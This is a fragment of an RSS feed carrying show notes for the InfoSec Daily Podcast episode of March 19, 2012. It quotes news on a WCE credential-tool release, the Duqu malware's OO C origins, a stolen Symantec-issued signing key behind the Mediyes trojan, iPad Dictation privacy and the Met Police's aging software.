<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.ampliasecurity.com/research/wce_v1_3beta.tgz"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ampliasecurity.com/research/wce_v1_3beta.tgz</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	WCE v1.3beta 32bit released. &nbsp;This version includes some bug fixes as well as it extends support to obtain NTLM hashes without code injection. &nbsp;Also a much needed feature of allowing for dumps of logins in cleartext for passwords that are stored by the Digest Authentication package.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.securelist.com/en/blog/677/The_mystery_of_Duqu_Framework_solved"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securelist.com/en/blog/677/The_mystery_of_Duqu_Framework_solved</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky Lab researchers today announced that with the help of the security community they were able to unravel the origins of a well-masked programming language used to write the communications module in Duqu, the information-stealing malware that researchers at Kaspersky and other firms say is connected to Stuxnet and that the same group of actors is behind both malware attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Turns out the attackers used object-oriented C language compiled with Microsoft Visual Studio 2008 &#8212; which indicates that it wasn&#39;t your typical malware writer behind it, but more of an &quot;old school&quot; programmer, according to Kaspersky researchers. &quot;This is not common for malware writers, that&#39;s for sure,&quot; Vitaly Kamluk, chief malware analyst, said in a press briefing today. &quot;This looks like a normal style for coding enterprise-wide applications.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More than 200 comments and 60+ e-mail messages with suggestions about possible languages and frameworks that could have been used for generating the Duqu Framework code. We would like to say a big &lsquo;Thank you!&rsquo; to everyone who participated in this quest to help us identify the mysterious code.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Let us review the most popular suggestions we got from you:</span></p>
<ul style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Variants of LISP</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Forth</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Erlang</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google Go</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Delphi</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">OO C</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Old compilers for C++ and other languages</span></li>
</ul>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to some very useful and knowledgeable comments, we can now say with a high degree of certainty that we have found the correct answer. I would like to quote the most relevant comments which helped us solve the puzzle:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">igorsk</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Simple Object Orientation (for C)</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems someone over at reddit (</span><a href="http://www.reddit.com/r/ReverseEngineering/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.reddit.com/r/ReverseEngineering/</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">) hit the jackpot: the code snippets look _very_ similar to what this would produce:</span><a href="http://daifukkat.su/wiki/index.php/SOO"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://daifukkat.su/wiki/index.php/SOO</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are a few other OO frameworks for C, but they don&#39;t match as well:</span><a href="http://ooc-coding.sourceforge.net/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://ooc-coding.sourceforge.net/</span></a><a href="http://sooc.sourceforge.net/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://sooc.sourceforge.net/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jonwil</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Re: Other C/C++ compiler?</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">I have seen how GCC works internally and its ABI (for a number of different versions) and I can confirm that the Duqu code is definitely not generated by GCC. I don&rsquo;t know how other C++ compilers work but the things I see in the ASM (like where the pointers to the functions go, the way the &quot;this&quot; pointer is passed etc) do not suggest C++ to me but something else entirely. (such as the aforementioned &quot;object-oriented&quot; frameworks for C that exist)</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">igorsk</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Re: Other C/C++ compiler?</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;m 99% sure the machine code was generated by MSVC. It&rsquo;s something you get a feel with experience, but I can point out two things that are quite characteristic of MSVC: 1) it uses esi as the first candidate for temporary storage; 2) &ldquo;pop ecx&rdquo; instead of &ldquo;add esp, 4&rdquo;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We also received two very interesting e-mail messages. Pascal Bertrand aka bps and another author who preferred to remain anonymous suggested that the code was generated from a custom object-oriented C dialect, generally called &ldquo;OO C&rdquo;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcadvisor.co.uk/news/security/3345415/stolen-encryption-key-source-of-compromised-certificate-problem-symantec-says"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3345415/stolen-encryption-key-source-of-compromised-certificate-problem-symantec-says</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When Kaspersky Lab last week spotted code-signed Trojan malware dubbed Mediyes that had been signed with a digital certificate owned by Swiss firm Conpavi AG and issued by Symantec, it touched off a hunt to determine the source of the problem.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The answer, says Symantec&#39;s website</span><a href="http://www.networkworld.com/topics/security.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">security</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> services (based on the VeriSign certificate and authentication services acquisition), is that somehow the private encryption key associated with Conpavi AG certificate had been stolen.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The private key for Conpavi was exposed,&quot; says Quentin Liu, senior director of engineering at the Symantec division. &quot;Someone got hold of the private key.&quot; For this type of digital certificate, the private key is held by the certificate owner, in this case, Conpavi. Whether the private encryption key was stolen by an insider at Conpavi or outside attacker isn&#39;t known. But the incident points out the risks associated with private encryption keys for this type of digital certificate and the need to safeguard them.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec has revoked the Conpavi certificate that was used to digitally sign the Mediyes malware and is assisting the Swiss firm in analyzing what occurred and helping them prevent this from happening again.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The incident also highlights why malware authors want to sign the code they write, which in the case of Mediyes, is a so-called dropper file used to seed computers so they can be easily manipulated for other purposes. In the case of the Mediyes Trojan, the purpose was to intercept browser requests sent to search engines so the attackers could earn money in a fraudulent pay-per-click scheme.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky last week estimated 5,000 users, mainly in Western Europe, including Germany, Switzerland, Sweden, France and Italy, had been exploited with the Mediyes Trojan for this purpose.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/btl/new-ipad-feature-dictation-sendsstores-private-data-to-apple-servers/71841"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.zdnet.com/blog/btl/new-ipad-feature-dictation-sendsstores-private-data-to-apple-servers/71841</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After spending a solid weekend with the new iPad, I finally set my sights on one of the noted features: Dictation.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What I&rsquo;ve come to learn about Dictation is that it requires more from me to use than I&rsquo;m comfortable with Apple requesting. Thankfully, they&rsquo;re upfront about </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">some</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of the data they collect; however, their intentions are vague at best, and they use some rather loose verbiage, which I will cover in a bit.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To start, Apple&rsquo;s marketing of this feature is slightly misleading. Take a look at what Apple says about Dictation</span><a href="http://www.apple.com/ipad/features/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">on the new iPad features page</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">:</span><img height="183px;" src="https://lh5.googleusercontent.com/YXEZ03Kt1yPHQcpEbyDAwcz6BtgUImcijwuw3-iEIXR1VeOic6abMcWf8GLeC0gY7mEIzlZyO11-l68XF2HcNxdjFrudppTFn-NaZUZtw1puDAzogi0" width="529px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So simple, right? Just buy your new iPad, press the Dictation button, talk, press it again, then you&rsquo;re all set with your speech-to-text conversion! Well, unfortunately, Dictation is a feature bound by the following fine-print limitation (which can be found in light-gray at the bottom of</span><a href="http://www.apple.com/ipad/features/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the new iPad features page</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">):</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Some features require a Wi-Fi connection.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I found that to be the case after enabling Dictation for the first time and being presented with the following dialogue box:</span><img height="263px;" src="https://lh6.googleusercontent.com/fR5hTh_Z7dT9mMla8olsaihm8pFQyj9UpOVqK8AfExMySt7hS5Tlw0qT7BY6OhJrM2y3r4ww4Vut0Nnco2chxdzeD9iJBQf7D6B1Coo-ZlhcDkmYCDE" width="416px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Information like&rdquo; is so vague and facile, is it not? Anyway, I thought to myself, &ldquo;If this is true, then I wonder what happens if I have Dictation </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">enabled</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> but Wi-Fi </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">disabled</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.&rdquo; Lo and behold, the Dictation key next to the space bar completely disappears. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dictation is fully disabled and non-functional if you aren&rsquo;t connected to the Internet.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> I presume a 4G connection will suffice in lieu of Wi-Fi, but I cannot verify that at the moment since I don&rsquo;t have a 4G-capable iPad.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.guardian.co.uk/government-computing-network/2012/mar/16/met-police-using-80s-software"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.guardian.co.uk/government-computing-network/2012/mar/16/met-police-using-80s-software</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Metropolitan Police Service will use software from the 1980s to coordinate the command and communications of its policing operations during the London Olympic Games.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The software, known as MetOps, is installed in the force&#39;s special operations room (SOR), the central control room providing communications support during more than 500 major incidents and events each year, according to a</span><a href="http://content.met.police.uk/cs/Satellite?blobcol=urldata&amp;blobheadername1=Content-Type&amp;blobheadername2=Content-Disposition&amp;blobheadervalue1=application%2Fpdf&amp;blobheadervalue2=inline%3B+filename%3D%22145%2F595%2Fco553-114DaysInAugust.pdf%22&amp;blobkey=id&amp;blobtable=MungoBlobs&amp;blobwhere=1283551523589&amp;ssbinary=true"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> by the Met into the riots of August 2011.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">MetOps, a messaging and recording system, was not designed for dynamic incident management, and means commanders have no simple way to view the latest situation during an evolving incident, the report says.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The age of MetOps system means that it is not linked directly to the software used in the force&#39;s central communications centre, known as the computer aided dispatch (CAD) system. &quot;This can result in the central communications centre being unaware of what is being dealt with within SOR, and conversely SOR being unaware of what is being dealt with through the CAD system,&quot; says the report.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-623-5mil-rdp-wce-updated-duqu-solved-stolen-encryption-dictation-spy-30yr-old-software/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3657/0/infosec-daily-podcast-episode-623.mp3" length="19366434" type="audio/mpeg" />
		<itunes:duration>0:40:18</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 623 for March 19, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Beau Woods, Karthik Rangarajan, and Dr. Bonez.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 623 for March 19, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Beau Woods, Karthik Rangarajan, and Dr. Bonez.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.ea25e3ef-5027-40e4-a56f-ad6cfcd06cb3[/amazon-carrousel]
 
Stories
Source: &#160;http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml
